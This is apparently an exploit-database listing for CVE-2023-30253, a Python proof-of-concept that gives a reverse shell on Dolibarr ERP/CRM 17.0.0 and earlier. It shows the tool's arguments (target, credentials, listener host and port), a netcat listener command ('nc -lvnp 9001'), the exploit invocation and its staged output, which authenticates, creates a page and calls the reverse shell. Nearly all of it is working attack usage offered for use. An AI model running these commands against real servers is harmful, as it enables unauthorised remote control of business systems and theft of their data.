Exploit for OS Command Injection in Dolibarr Dolibarr_Erp\/Crm CVE-2023-30253

Name: Exploit for OS Command Injection in Dolibarr Dolibarr_Erp/Crm CVE-2023-30253
Rating: 5 (166 reviews)

2025-12-24 | CVSS 8.8

## https://sploitus.com/exploit?id=CA41E3A2-1CAC-5784-8A40-DB785D1A3137
# POC exploit for Dolibarr     
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit
```

Run the netcat on your host:
``` 
➜ nc -lvnp 9001
```
Run the exploit (example):
```
➜ python3 exploit.py http://example.com login passsword 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
```